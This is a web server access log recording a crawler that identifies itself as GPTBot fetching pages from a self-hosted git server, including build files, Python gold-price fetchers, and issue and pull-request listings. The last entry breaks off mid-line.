"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:17:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 59769] [Gzip 16.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:17:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:17:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:17:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10965] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:17:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 59739] [Gzip 16.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:17:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:17:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:17:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:17:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:17:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:17:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:17:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:17:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:17:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10940] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:17:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10134] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=source" [Client 74.7.227.38] [Length 12241] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11372] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=source" [Client 74.7.227.38] [Length 12209] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11371] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md?display=rendered" [Client 74.7.227.38] [Length 16209] [Gzip 2.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:17:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9946] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:17:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11882] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:17:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:17:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 37472] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 18131] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 